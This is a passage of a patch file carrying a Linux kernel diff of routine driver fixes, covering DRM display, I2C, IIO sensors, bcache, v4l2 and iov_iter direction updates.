++++ b/drivers/gpu/drm/solomon/ssd130x.c
+@@ -665,18 +665,8 @@ static const struct drm_crtc_helper_funcs ssd130x_crtc_helper_funcs = {
+ 	.atomic_check = ssd130x_crtc_helper_atomic_check,
+ };
+ 
+-static void ssd130x_crtc_reset(struct drm_crtc *crtc)
+-{
+-	struct drm_device *drm = crtc->dev;
+-	struct ssd130x_device *ssd130x = drm_to_ssd130x(drm);
+-
+-	ssd130x_init(ssd130x);
+-
+-	drm_atomic_helper_crtc_reset(crtc);
+-}
+-
+ static const struct drm_crtc_funcs ssd130x_crtc_funcs = {
+-	.reset = ssd130x_crtc_reset,
++	.reset = drm_atomic_helper_crtc_reset,
+ 	.destroy = drm_crtc_cleanup,
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
+@@ -695,6 +685,12 @@ static void ssd130x_encoder_helper_atomic_enable(struct drm_encoder *encoder,
+ 	if (ret)
+ 		return;
+ 
++	ret = ssd130x_init(ssd130x);
++	if (ret) {
++		ssd130x_power_off(ssd130x);
++		return;
++	}
++
+ 	ssd130x_write_cmd(ssd130x, 1, SSD130X_DISPLAY_ON);
+ 
+ 	backlight_enable(ssd130x->bl_dev);
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index 470432c8fd707..c4b73d9dd0409 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -3009,7 +3009,8 @@ static int vc4_hdmi_cec_init(struct vc4_hdmi *vc4_hdmi)
+ 	}
+ 
+ 	vc4_hdmi->cec_adap = cec_allocate_adapter(&vc4_hdmi_cec_adap_ops,
+-						  vc4_hdmi, "vc4",
++						  vc4_hdmi,
++						  vc4_hdmi->variant->card_name,
+ 						  CEC_CAP_DEFAULTS |
+ 						  CEC_CAP_CONNECTOR_INFO, 1);
+ 	ret = PTR_ERR_OR_ZERO(vc4_hdmi->cec_adap);
+diff --git a/drivers/hv/hv_balloon.c b/drivers/hv/hv_balloon.c
+index 6c127f061f06d..f98c849096f7b 100644
+--- a/drivers/hv/hv_balloon.c
++++ b/drivers/hv/hv_balloon.c
+@@ -1911,7 +1911,7 @@ static void  hv_balloon_debugfs_init(struct hv_dynmem_device *b)
+ 
+ static void  hv_balloon_debugfs_exit(struct hv_dynmem_device *b)
+ {
+-	debugfs_remove(debugfs_lookup("hv-balloon", NULL));
++	debugfs_lookup_and_remove("hv-balloon", NULL);
+ }
+ 
+ #else
+diff --git a/drivers/i2c/busses/i2c-designware-pcidrv.c b/drivers/i2c/busses/i2c-designware-pcidrv.c
+index e499f96506c52..782fe1ef3ca10 100644
+--- a/drivers/i2c/busses/i2c-designware-pcidrv.c
++++ b/drivers/i2c/busses/i2c-designware-pcidrv.c
+@@ -396,6 +396,8 @@ static const struct pci_device_id i2_designware_pci_ids[] = {
+ 	{ PCI_VDEVICE(ATI,  0x73a4), navi_amd },
+ 	{ PCI_VDEVICE(ATI,  0x73e4), navi_amd },
+ 	{ PCI_VDEVICE(ATI,  0x73c4), navi_amd },
++	{ PCI_VDEVICE(ATI,  0x7444), navi_amd },
++	{ PCI_VDEVICE(ATI,  0x7464), navi_amd },
+ 	{ 0,}
+ };
+ MODULE_DEVICE_TABLE(pci, i2_designware_pci_ids);
+diff --git a/drivers/i2c/busses/i2c-mxs.c b/drivers/i2c/busses/i2c-mxs.c
+index 5af5cffc444ef..d113bed795452 100644
+--- a/drivers/i2c/busses/i2c-mxs.c
++++ b/drivers/i2c/busses/i2c-mxs.c
+@@ -826,8 +826,8 @@ static int mxs_i2c_probe(struct platform_device *pdev)
+ 	/* Setup the DMA */
+ 	i2c->dmach = dma_request_chan(dev, "rx-tx");
+ 	if (IS_ERR(i2c->dmach)) {
+-		dev_err(dev, "Failed to request dma\n");
+-		return PTR_ERR(i2c->dmach);
++		return dev_err_probe(dev, PTR_ERR(i2c->dmach),
++				     "Failed to request dma\n");
+ 	}
+ 
+ 	platform_set_drvdata(pdev, i2c);
+diff --git a/drivers/i2c/busses/i2c-rk3x.c b/drivers/i2c/busses/i2c-rk3x.c
+index d1658ed76562b..b31cf4f18f854 100644
+--- a/drivers/i2c/busses/i2c-rk3x.c
++++ b/drivers/i2c/busses/i2c-rk3x.c
+@@ -80,7 +80,7 @@ enum {
+ #define DEFAULT_SCL_RATE  (100 * 1000) /* Hz */
+ 
+ /**
+- * struct i2c_spec_values:
++ * struct i2c_spec_values - I2C specification values for various modes
+  * @min_hold_start_ns: min hold time (repeated) START condition
+  * @min_low_ns: min LOW period of the SCL clock
+  * @min_high_ns: min HIGH period of the SCL cloc
+@@ -136,7 +136,7 @@ static const struct i2c_spec_values fast_mode_plus_spec = {
+ };
+ 
+ /**
+- * struct rk3x_i2c_calced_timings:
++ * struct rk3x_i2c_calced_timings - calculated V1 timings
+  * @div_low: Divider output for low
+  * @div_high: Divider output for high
+  * @tuning: Used to adjust setup/hold data time,
+@@ -159,7 +159,7 @@ enum rk3x_i2c_state {
+ };
+ 
+ /**
+- * struct rk3x_i2c_soc_data:
++ * struct rk3x_i2c_soc_data - SOC-specific data
+  * @grf_offset: offset inside the grf regmap for setting the i2c type
+  * @calc_timings: Callback function for i2c timing information calculated
+  */
+@@ -239,7 +239,8 @@ static inline void rk3x_i2c_clean_ipd(struct rk3x_i2c *i2c)
+ }
+ 
+ /**
+- * Generate a START condition, which triggers a REG_INT_START interrupt.
++ * rk3x_i2c_start - Generate a START condition, which triggers a REG_INT_START interrupt.
++ * @i2c: target controller data
+  */
+ static void rk3x_i2c_start(struct rk3x_i2c *i2c)
+ {
+@@ -258,8 +259,8 @@ static void rk3x_i2c_start(struct rk3x_i2c *i2c)
+ }
+ 
+ /**
+- * Generate a STOP condition, which triggers a REG_INT_STOP interrupt.
+- *
++ * rk3x_i2c_stop - Generate a STOP condition, which triggers a REG_INT_STOP interrupt.
++ * @i2c: target controller data
+  * @error: Error code to return in rk3x_i2c_xfer
+  */
+ static void rk3x_i2c_stop(struct rk3x_i2c *i2c, int error)
+@@ -298,7 +299,8 @@ static void rk3x_i2c_stop(struct rk3x_i2c *i2c, int error)
+ }
+ 
+ /**
+- * Setup a read according to i2c->msg
++ * rk3x_i2c_prepare_read - Setup a read according to i2c->msg
++ * @i2c: target controller data
+  */
+ static void rk3x_i2c_prepare_read(struct rk3x_i2c *i2c)
+ {
+@@ -329,7 +331,8 @@ static void rk3x_i2c_prepare_read(struct rk3x_i2c *i2c)
+ }
+ 
+ /**
+- * Fill the transmit buffer with data from i2c->msg
++ * rk3x_i2c_fill_transmit_buf - Fill the transmit buffer with data from i2c->msg
++ * @i2c: target controller data
+  */
+ static void rk3x_i2c_fill_transmit_buf(struct rk3x_i2c *i2c)
+ {
+@@ -532,11 +535,10 @@ out:
+ }
+ 
+ /**
+- * Get timing values of I2C specification
+- *
++ * rk3x_i2c_get_spec - Get timing values of I2C specification
+  * @speed: Desired SCL frequency
+  *
+- * Returns: Matched i2c spec values.
++ * Return: Matched i2c_spec_values.
+  */
+ static const struct i2c_spec_values *rk3x_i2c_get_spec(unsigned int speed)
+ {
+@@ -549,13 +551,12 @@ static const struct i2c_spec_values *rk3x_i2c_get_spec(unsigned int speed)
+ }
+ 
+ /**
+- * Calculate divider values for desired SCL frequency
+- *
++ * rk3x_i2c_v0_calc_timings - Calculate divider values for desired SCL frequency
+  * @clk_rate: I2C input clock rate
+  * @t: Known I2C timing information
+  * @t_calc: Caculated rk3x private timings that would be written into regs
+  *
+- * Returns: 0 on success, -EINVAL if the goal SCL rate is too slow. In that case
++ * Return: %0 on success, -%EINVAL if the goal SCL rate is too slow. In that case
+  * a best-effort divider value is returned in divs. If the target rate is
+  * too high, we silently use the highest possible rate.
+  */
+@@ -710,13 +711,12 @@ static int rk3x_i2c_v0_calc_timings(unsigned long clk_rate,
+ }
+ 
+ /**
+- * Calculate timing values for desired SCL frequency
+- *
++ * rk3x_i2c_v1_calc_timings - Calculate timing values for desired SCL frequency
+  * @clk_rate: I2C input clock rate
+  * @t: Known I2C timing information
+  * @t_calc: Caculated rk3x private timings that would be written into regs
+  *
+- * Returns: 0 on success, -EINVAL if the goal SCL rate is too slow. In that case
++ * Return: %0 on success, -%EINVAL if the goal SCL rate is too slow. In that case
+  * a best-effort divider value is returned in divs. If the target rate is
+  * too high, we silently use the highest possible rate.
+  * The following formulas are v1's method to calculate timings.
+@@ -960,14 +960,14 @@ static int rk3x_i2c_clk_notifier_cb(struct notifier_block *nb, unsigned long
+ }
+ 
+ /**
+- * Setup I2C registers for an I2C operation specified by msgs, num.
+- *
+- * Must be called with i2c->lock held.
+- *
++ * rk3x_i2c_setup - Setup I2C registers for an I2C operation specified by msgs, num.
++ * @i2c: target controller data
+  * @msgs: I2C msgs to process
+  * @num: Number of msgs
+  *
+- * returns: Number of I2C msgs processed or negative in case of error
++ * Must be called with i2c->lock held.
++ *
++ * Return: Number of I2C msgs processed or negative in case of error
+  */
+ static int rk3x_i2c_setup(struct rk3x_i2c *i2c, struct i2c_msg *msgs, int num)
+ {
+diff --git a/drivers/iio/accel/hid-sensor-accel-3d.c b/drivers/iio/accel/hid-sensor-accel-3d.c
+index a2def6f9380a3..5eac7ea199931 100644
+--- a/drivers/iio/accel/hid-sensor-accel-3d.c
++++ b/drivers/iio/accel/hid-sensor-accel-3d.c
+@@ -280,6 +280,7 @@ static int accel_3d_capture_sample(struct hid_sensor_hub_device *hsdev,
+ 			hid_sensor_convert_timestamp(
+ 					&accel_state->common_attributes,
+ 					*(int64_t *)raw_data);
++		ret = 0;
+ 	break;
+ 	default:
+ 		break;
+diff --git a/drivers/iio/adc/berlin2-adc.c b/drivers/iio/adc/berlin2-adc.c
+index 3d2e8b4db61ae..a4e7c7eff5acf 100644
+--- a/drivers/iio/adc/berlin2-adc.c
++++ b/drivers/iio/adc/berlin2-adc.c
+@@ -298,8 +298,10 @@ static int berlin2_adc_probe(struct platform_device *pdev)
+ 	int ret;
+ 
+ 	indio_dev = devm_iio_device_alloc(&pdev->dev, sizeof(*priv));
+-	if (!indio_dev)
++	if (!indio_dev) {
++		of_node_put(parent_np);
+ 		return -ENOMEM;
++	}
+ 
+ 	priv = iio_priv(indio_dev);
+ 
+diff --git a/drivers/iio/adc/imx8qxp-adc.c b/drivers/iio/adc/imx8qxp-adc.c
+index 36777b827165a..f5a0fc9e64c54 100644
+--- a/drivers/iio/adc/imx8qxp-adc.c
++++ b/drivers/iio/adc/imx8qxp-adc.c
+@@ -86,6 +86,8 @@
+ 
+ #define IMX8QXP_ADC_TIMEOUT		msecs_to_jiffies(100)
+ 
++#define IMX8QXP_ADC_MAX_FIFO_SIZE		16
++
+ struct imx8qxp_adc {
+ 	struct device *dev;
+ 	void __iomem *regs;
+@@ -95,6 +97,7 @@ struct imx8qxp_adc {
+ 	/* Serialise ADC channel reads */
+ 	struct mutex lock;
+ 	struct completion completion;
++	u32 fifo[IMX8QXP_ADC_MAX_FIFO_SIZE];
+ };
+ 
+ #define IMX8QXP_ADC_CHAN(_idx) {				\
+@@ -238,8 +241,7 @@ static int imx8qxp_adc_read_raw(struct iio_dev *indio_dev,
+ 			return ret;
+ 		}
+ 
+-		*val = FIELD_GET(IMX8QXP_ADC_RESFIFO_VAL_MASK,
+-				 readl(adc->regs + IMX8QXP_ADR_ADC_RESFIFO));
++		*val = adc->fifo[0];
+ 
+ 		mutex_unlock(&adc->lock);
+ 		return IIO_VAL_INT;
+@@ -265,10 +267,15 @@ static irqreturn_t imx8qxp_adc_isr(int irq, void *dev_id)
+ {
+ 	struct imx8qxp_adc *adc = dev_id;
+ 	u32 fifo_count;
++	int i;
+ 
+ 	fifo_count = FIELD_GET(IMX8QXP_ADC_FCTRL_FCOUNT_MASK,
+ 			       readl(adc->regs + IMX8QXP_ADR_ADC_FCTRL));
+ 
++	for (i = 0; i < fifo_count; i++)
++		adc->fifo[i] = FIELD_GET(IMX8QXP_ADC_RESFIFO_VAL_MASK,
++				readl_relaxed(adc->regs + IMX8QXP_ADR_ADC_RESFIFO));
++
+ 	if (fifo_count)
+ 		complete(&adc->completion);
+ 
+diff --git a/drivers/iio/adc/stm32-dfsdm-adc.c b/drivers/iio/adc/stm32-dfsdm-adc.c
+index 6d21ea84fa82d..a428bdb567d52 100644
+--- a/drivers/iio/adc/stm32-dfsdm-adc.c
++++ b/drivers/iio/adc/stm32-dfsdm-adc.c
+@@ -1520,6 +1520,7 @@ static const struct of_device_id stm32_dfsdm_adc_match[] = {
+ 	},
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, stm32_dfsdm_adc_match);
+ 
+ static int stm32_dfsdm_adc_probe(struct platform_device *pdev)
+ {
+diff --git a/drivers/iio/adc/twl6030-gpadc.c b/drivers/iio/adc/twl6030-gpadc.c
+index f53e8558b560c..32873fb5f3676 100644
+--- a/drivers/iio/adc/twl6030-gpadc.c
++++ b/drivers/iio/adc/twl6030-gpadc.c
+@@ -57,6 +57,18 @@
+ #define TWL6030_GPADCS				BIT(1)
+ #define TWL6030_GPADCR				BIT(0)
+ 
++#define USB_VBUS_CTRL_SET			0x04
++#define USB_ID_CTRL_SET				0x06
++
++#define TWL6030_MISC1				0xE4
++#define VBUS_MEAS				0x01
++#define ID_MEAS					0x01
++
++#define VAC_MEAS                0x04
++#define VBAT_MEAS               0x02
++#define BB_MEAS                 0x01
++
++
+ /**
+  * struct twl6030_chnl_calib - channel calibration
+  * @gain:		slope coefficient for ideal curve
+@@ -927,6 +939,26 @@ static int twl6030_gpadc_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = twl_i2c_write_u8(TWL_MODULE_USB, VBUS_MEAS, USB_VBUS_CTRL_SET);
++	if (ret < 0) {
++		dev_err(dev, "failed to wire up inputs\n");
++		return ret;
++	}
++
++	ret = twl_i2c_write_u8(TWL_MODULE_USB, ID_MEAS, USB_ID_CTRL_SET);
++	if (ret < 0) {
++		dev_err(dev, "failed to wire up inputs\n");
++		return ret;
++	}
++
++	ret = twl_i2c_write_u8(TWL6030_MODULE_ID0,
++				VBAT_MEAS | BB_MEAS | VAC_MEAS,
++				TWL6030_MISC1);
++	if (ret < 0) {
++		dev_err(dev, "failed to wire up inputs\n");
++		return ret;
++	}
++
+ 	indio_dev->name = DRIVER_NAME;
+ 	indio_dev->info = &twl6030_gpadc_iio_info;
+ 	indio_dev->modes = INDIO_DIRECT_MODE;
+diff --git a/drivers/iio/adc/xilinx-ams.c b/drivers/iio/adc/xilinx-ams.c
+index 5b4bdf3a26bb8..a507d2e170792 100644
+--- a/drivers/iio/adc/xilinx-ams.c
++++ b/drivers/iio/adc/xilinx-ams.c
+@@ -1329,7 +1329,7 @@ static int ams_parse_firmware(struct iio_dev *indio_dev)
+ 
+ 	dev_channels = devm_krealloc(dev, ams_channels, dev_size, GFP_KERNEL);
+ 	if (!dev_channels)
+-		ret = -ENOMEM;
++		return -ENOMEM;
+ 
+ 	indio_dev->channels = dev_channels;
+ 	indio_dev->num_channels = num_channels;
+diff --git a/drivers/iio/gyro/hid-sensor-gyro-3d.c b/drivers/iio/gyro/hid-sensor-gyro-3d.c
+index 8f0ad022c7f1b..698c50da1f109 100644
+--- a/drivers/iio/gyro/hid-sensor-gyro-3d.c
++++ b/drivers/iio/gyro/hid-sensor-gyro-3d.c
+@@ -231,6 +231,7 @@ static int gyro_3d_capture_sample(struct hid_sensor_hub_device *hsdev,
+ 		gyro_state->timestamp =
+ 			hid_sensor_convert_timestamp(&gyro_state->common_attributes,
+ 						     *(s64 *)raw_data);
++		ret = 0;
+ 	break;
+ 	default:
+ 		break;
+diff --git a/drivers/iio/imu/fxos8700_core.c b/drivers/iio/imu/fxos8700_core.c
+index 423cfe526f2a1..6d189c4b9ff96 100644
+--- a/drivers/iio/imu/fxos8700_core.c
++++ b/drivers/iio/imu/fxos8700_core.c
+@@ -10,6 +10,7 @@
+ #include <linux/regmap.h>
+ #include <linux/acpi.h>
+ #include <linux/bitops.h>
++#include <linux/bitfield.h>
+ 
+ #include <linux/iio/iio.h>
+ #include <linux/iio/sysfs.h>
+@@ -144,9 +145,8 @@
+ #define FXOS8700_NVM_DATA_BNK0      0xa7
+ 
+ /* Bit definitions for FXOS8700_CTRL_REG1 */
+-#define FXOS8700_CTRL_ODR_MSK       0x38
+ #define FXOS8700_CTRL_ODR_MAX       0x00
+-#define FXOS8700_CTRL_ODR_MIN       GENMASK(4, 3)
++#define FXOS8700_CTRL_ODR_MSK       GENMASK(5, 3)
+ 
+ /* Bit definitions for FXOS8700_M_CTRL_REG1 */
+ #define FXOS8700_HMS_MASK           GENMASK(1, 0)
+@@ -320,7 +320,7 @@ static enum fxos8700_sensor fxos8700_to_sensor(enum iio_chan_type iio_type)
+ 	switch (iio_type) {
+ 	case IIO_ACCEL:
+ 		return FXOS8700_ACCEL;
+-	case IIO_ANGL_VEL:
++	case IIO_MAGN:
+ 		return FXOS8700_MAGN;
+ 	default:
+ 		return -EINVAL;
+@@ -345,15 +345,35 @@ static int fxos8700_set_active_mode(struct fxos8700_data *data,
+ static int fxos8700_set_scale(struct fxos8700_data *data,
+ 			      enum fxos8700_sensor t, int uscale)
+ {
+-	int i;
++	int i, ret, val;
++	bool active_mode;
+ 	static const int scale_num = ARRAY_SIZE(fxos8700_accel_scale);
+ 	struct device *dev = regmap_get_device(data->regmap);
+ 
+ 	if (t == FXOS8700_MAGN) {
+-		dev_err(dev, "Magnetometer scale is locked at 1200uT\n");
++		dev_err(dev, "Magnetometer scale is locked at 0.001Gs\n");
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * When device is in active mode, it failed to set an ACCEL
++	 * full-scale range(2g/4g/8g) in FXOS8700_XYZ_DATA_CFG.
++	 * This is not align with the datasheet, but it is a fxos8700
++	 * chip behavier. Set the device in standby mode before setting
++	 * an ACCEL full-scale range.
++	 */
++	ret = regmap_read(data->regmap, FXOS8700_CTRL_REG1, &val);
++	if (ret)
++		return ret;
++
++	active_mode = val & FXOS8700_ACTIVE;
++	if (active_mode) {
++		ret = regmap_write(data->regmap, FXOS8700_CTRL_REG1,
++				   val & ~FXOS8700_ACTIVE);
++		if (ret)
++			return ret;
++	}
++
+ 	for (i = 0; i < scale_num; i++)
+ 		if (fxos8700_accel_scale[i].uscale == uscale)
+ 			break;
+@@ -361,8 +381,12 @@ static int fxos8700_set_scale(struct fxos8700_data *data,
+ 	if (i == scale_num)
+ 		return -EINVAL;
+ 
+-	return regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG,
++	ret = regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG,
+ 			    fxos8700_accel_scale[i].bits);
++	if (ret)
++		return ret;
++	return regmap_write(data->regmap, FXOS8700_CTRL_REG1,
++				  active_mode);
+ }
+ 
+ static int fxos8700_get_scale(struct fxos8700_data *data,
+@@ -372,7 +396,7 @@ static int fxos8700_get_scale(struct fxos8700_data *data,
+ 	static const int scale_num = ARRAY_SIZE(fxos8700_accel_scale);
+ 
+ 	if (t == FXOS8700_MAGN) {
+-		*uscale = 1200; /* Magnetometer is locked at 1200uT */
++		*uscale = 1000; /* Magnetometer is locked at 0.001Gs */
+ 		return 0;
+ 	}
+ 
+@@ -394,22 +418,61 @@ static int fxos8700_get_data(struct fxos8700_data *data, int chan_type,
+ 			     int axis, int *val)
+ {
+ 	u8 base, reg;
++	s16 tmp;
+ 	int ret;
+-	enum fxos8700_sensor type = fxos8700_to_sensor(chan_type);
+ 
+-	base = type ? FXOS8700_OUT_X_MSB : FXOS8700_M_OUT_X_MSB;
++	/*
++	 * Different register base addresses varies with channel types.
++	 * This bug hasn't been noticed before because using an enum is
++	 * really hard to read. Use an a switch statement to take over that.
++	 */
++	switch (chan_type) {
++	case IIO_ACCEL:
++		base = FXOS8700_OUT_X_MSB;
++		break;
++	case IIO_MAGN:
++		base = FXOS8700_M_OUT_X_MSB;
++		break;
++	default:
++		return -EINVAL;
++	}
+ 
+ 	/* Block read 6 bytes of device output registers to avoid data loss */
+ 	ret = regmap_bulk_read(data->regmap, base, data->buf,
+-			       FXOS8700_DATA_BUF_SIZE);
++			       sizeof(data->buf));
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* Convert axis to buffer index */
+ 	reg = axis - IIO_MOD_X;
+ 
++	/*
++	 * Convert to native endianness. The accel data and magn data
++	 * are signed, so a forced type conversion is needed.
++	 */
++	tmp = be16_to_cpu(data->buf[reg]);
++
++	/*
++	 * ACCEL output data registers contain the X-axis, Y-axis, and Z-axis
++	 * 14-bit left-justified sample data and MAGN output data registers
++	 * contain the X-axis, Y-axis, and Z-axis 16-bit sample data. Apply
++	 * a signed 2 bits right shift to the readback raw data from ACCEL
++	 * output data register and keep that from MAGN sensor as the origin.
++	 * Value should be extended to 32 bit.
++	 */
++	switch (chan_type) {
++	case IIO_ACCEL:
++		tmp = tmp >> 2;
++		break;
++	case IIO_MAGN:
++		/* Nothing to do */
++		break;
++	default:
++		return -EINVAL;
++	}
++
+ 	/* Convert to native endianness */
+-	*val = sign_extend32(be16_to_cpu(data->buf[reg]), 15);
++	*val = sign_extend32(tmp, 15);
+ 
+ 	return 0;
+ }
+@@ -445,10 +508,9 @@ static int fxos8700_set_odr(struct fxos8700_data *data, enum fxos8700_sensor t,
+ 	if (i >= odr_num)
+ 		return -EINVAL;
+ 
+-	return regmap_update_bits(data->regmap,
+-				  FXOS8700_CTRL_REG1,
+-				  FXOS8700_CTRL_ODR_MSK + FXOS8700_ACTIVE,
+-				  fxos8700_odr[i].bits << 3 | active_mode);
++	val &= ~FXOS8700_CTRL_ODR_MSK;
++	val |= FIELD_PREP(FXOS8700_CTRL_ODR_MSK, fxos8700_odr[i].bits) | FXOS8700_ACTIVE;
++	return regmap_write(data->regmap, FXOS8700_CTRL_REG1, val);
+ }
+ 
+ static int fxos8700_get_odr(struct fxos8700_data *data, enum fxos8700_sensor t,
+@@ -461,7 +523,7 @@ static int fxos8700_get_odr(struct fxos8700_data *data, enum fxos8700_sensor t,
+ 	if (ret)
+ 		return ret;
+ 
+-	val &= FXOS8700_CTRL_ODR_MSK;
++	val = FIELD_GET(FXOS8700_CTRL_ODR_MSK, val);
+ 
+ 	for (i = 0; i < odr_num; i++)
+ 		if (val == fxos8700_odr[i].bits)
+@@ -526,7 +588,7 @@ static IIO_CONST_ATTR(in_accel_sampling_frequency_available,
+ static IIO_CONST_ATTR(in_magn_sampling_frequency_available,
+ 		      "1.5625 6.25 12.5 50 100 200 400 800");
+ static IIO_CONST_ATTR(in_accel_scale_available, "0.000244 0.000488 0.000976");
+-static IIO_CONST_ATTR(in_magn_scale_available, "0.000001200");
++static IIO_CONST_ATTR(in_magn_scale_available, "0.001000");
+ 
+ static struct attribute *fxos8700_attrs[] = {
+ 	&iio_const_attr_in_accel_sampling_frequency_available.dev_attr.attr,
+@@ -592,14 +654,19 @@ static int fxos8700_chip_init(struct fxos8700_data *data, bool use_spi)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Max ODR (800Hz individual or 400Hz hybrid), active mode */
+-	ret = regmap_write(data->regmap, FXOS8700_CTRL_REG1,
+-			   FXOS8700_CTRL_ODR_MAX | FXOS8700_ACTIVE);
++	/*
++	 * Set max full-scale range (+/-8G) for ACCEL sensor in chip
++	 * initialization then activate the device.
++	 */
++	ret = regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG, MODE_8G);
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Set for max full-scale range (+/-8G) */
+-	return regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG, MODE_8G);
++	/* Max ODR (800Hz individual or 400Hz hybrid), active mode */
++	return regmap_update_bits(data->regmap, FXOS8700_CTRL_REG1,
++				FXOS8700_CTRL_ODR_MSK | FXOS8700_ACTIVE,
++				FIELD_PREP(FXOS8700_CTRL_ODR_MSK, FXOS8700_CTRL_ODR_MAX) |
++				FXOS8700_ACTIVE);
+ }
+ 
+ static void fxos8700_chip_uninit(void *data)
+diff --git a/drivers/iio/light/cm32181.c b/drivers/iio/light/cm32181.c
+index 001055d097509..b1674a5bfa368 100644
+--- a/drivers/iio/light/cm32181.c
++++ b/drivers/iio/light/cm32181.c
+@@ -440,6 +440,8 @@ static int cm32181_probe(struct i2c_client *client)
+ 	if (!indio_dev)
+ 		return -ENOMEM;
+ 
++	i2c_set_clientdata(client, indio_dev);
++
+ 	/*
+ 	 * Some ACPI systems list 2 I2C resources for the CM3218 sensor, the
+ 	 * SMBus Alert Response Address (ARA, 0x0c) and the actual I2C address.
+@@ -460,8 +462,6 @@ static int cm32181_probe(struct i2c_client *client)
+ 			return PTR_ERR(client);
+ 	}
+ 
+-	i2c_set_clientdata(client, indio_dev);
+-
+ 	cm32181 = iio_priv(indio_dev);
+ 	cm32181->client = client;
+ 	cm32181->dev = dev;
+@@ -490,7 +490,8 @@ static int cm32181_probe(struct i2c_client *client)
+ 
+ static int cm32181_suspend(struct device *dev)
+ {
+-	struct i2c_client *client = to_i2c_client(dev);
++	struct cm32181_chip *cm32181 = iio_priv(dev_get_drvdata(dev));
++	struct i2c_client *client = cm32181->client;
+ 
+ 	return i2c_smbus_write_word_data(client, CM32181_REG_ADDR_CMD,
+ 					 CM32181_CMD_ALS_DISABLE);
+@@ -498,8 +499,8 @@ static int cm32181_suspend(struct device *dev)
+ 
+ static int cm32181_resume(struct device *dev)
+ {
+-	struct i2c_client *client = to_i2c_client(dev);
+ 	struct cm32181_chip *cm32181 = iio_priv(dev_get_drvdata(dev));
++	struct i2c_client *client = cm32181->client;
+ 
+ 	return i2c_smbus_write_word_data(client, CM32181_REG_ADDR_CMD,
+ 					 cm32181->conf_regs[CM32181_REG_ADDR_CMD]);
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt.c b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+index 8546b8816524c..730f2f1e09bbd 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+@@ -966,7 +966,7 @@ static void rtrs_clt_init_req(struct rtrs_clt_io_req *req,
+ 	refcount_set(&req->ref, 1);
+ 	req->mp_policy = clt_path->clt->mp_policy;
+ 
+-	iov_iter_kvec(&iter, READ, vec, 1, usr_len);
++	iov_iter_kvec(&iter, ITER_SOURCE, vec, 1, usr_len);
+ 	len = _copy_from_iter(req->iu->buf, usr_len, &iter);
+ 	WARN_ON(len != usr_len);
+ 
+diff --git a/drivers/isdn/mISDN/l1oip_core.c b/drivers/isdn/mISDN/l1oip_core.c
+index a77195e378b7b..c24771336f611 100644
+--- a/drivers/isdn/mISDN/l1oip_core.c
++++ b/drivers/isdn/mISDN/l1oip_core.c
+@@ -706,7 +706,7 @@ l1oip_socket_thread(void *data)
+ 		printk(KERN_DEBUG "%s: socket created and open\n",
+ 		       __func__);
+ 	while (!signal_pending(current)) {
+-		iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, recvbuf_size);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, recvbuf_size);
+ 		recvlen = sock_recvmsg(socket, &msg, 0);
+ 		if (recvlen > 0) {
+ 			l1oip_socket_parse(hc, &sin_rx, recvbuf, recvlen);
+diff --git a/drivers/md/bcache/bcache_ondisk.h b/drivers/md/bcache/bcache_ondisk.h
+index 97413586195b4..f96034e0ba4f2 100644
+--- a/drivers/md/bcache/bcache_ondisk.h
++++ b/drivers/md/bcache/bcache_ondisk.h
+@@ -106,7 +106,8 @@ static inline unsigned long bkey_bytes(const struct bkey *k)
+ 	return bkey_u64s(k) * sizeof(__u64);
+ }
+ 
+-#define bkey_copy(_dest, _src)	memcpy(_dest, _src, bkey_bytes(_src))
++#define bkey_copy(_dest, _src)	unsafe_memcpy(_dest, _src, bkey_bytes(_src), \
++					/* bkey is always padded */)
+ 
+ static inline void bkey_copy_key(struct bkey *dest, const struct bkey *src)
+ {
+diff --git a/drivers/md/bcache/journal.c b/drivers/md/bcache/journal.c
+index e5da469a42357..c182c21de2e81 100644
+--- a/drivers/md/bcache/journal.c
++++ b/drivers/md/bcache/journal.c
+@@ -149,7 +149,8 @@ add:
+ 				    bytes, GFP_KERNEL);
+ 			if (!i)
+ 				return -ENOMEM;
+-			memcpy(&i->j, j, bytes);
++			unsafe_memcpy(&i->j, j, bytes,
++				/* "bytes" was calculated by set_bytes() above */);
+ 			/* Add to the location after 'where' points to */
+ 			list_add(&i->list, where);
+ 			ret = 1;
+diff --git a/drivers/media/v4l2-core/v4l2-ctrls-api.c b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+index 3d3b6dc24ca63..002ea6588edf1 100644
+--- a/drivers/media/v4l2-core/v4l2-ctrls-api.c
++++ b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+@@ -150,8 +150,8 @@ static int user_to_new(struct v4l2_ext_control *c, struct v4l2_ctrl *ctrl)
+ 			 * then return an error.
+ 			 */
+ 			if (strlen(ctrl->p_new.p_char) == ctrl->maximum && last)
+-			ctrl->is_new = 1;
+ 				return -ERANGE;
++			ctrl->is_new = 1;
+ 		}
+ 		return ret;
+ 	default:
+diff --git a/drivers/misc/vmw_vmci/vmci_queue_pair.c b/drivers/misc/vmw_vmci/vmci_queue_pair.c
+index 844264e1b88cc..73d71c4ec1399 100644
+--- a/drivers/misc/vmw_vmci/vmci_queue_pair.c
++++ b/drivers/misc/vmw_vmci/vmci_queue_pair.c
+@@ -3044,7 +3044,7 @@ ssize_t vmci_qpair_enqueue(struct vmci_qp *qpair,
+ 	if (!qpair || !buf)
+ 		return VMCI_ERROR_INVALID_ARGS;
+ 
+-	iov_iter_kvec(&from, WRITE, &v, 1, buf_size);
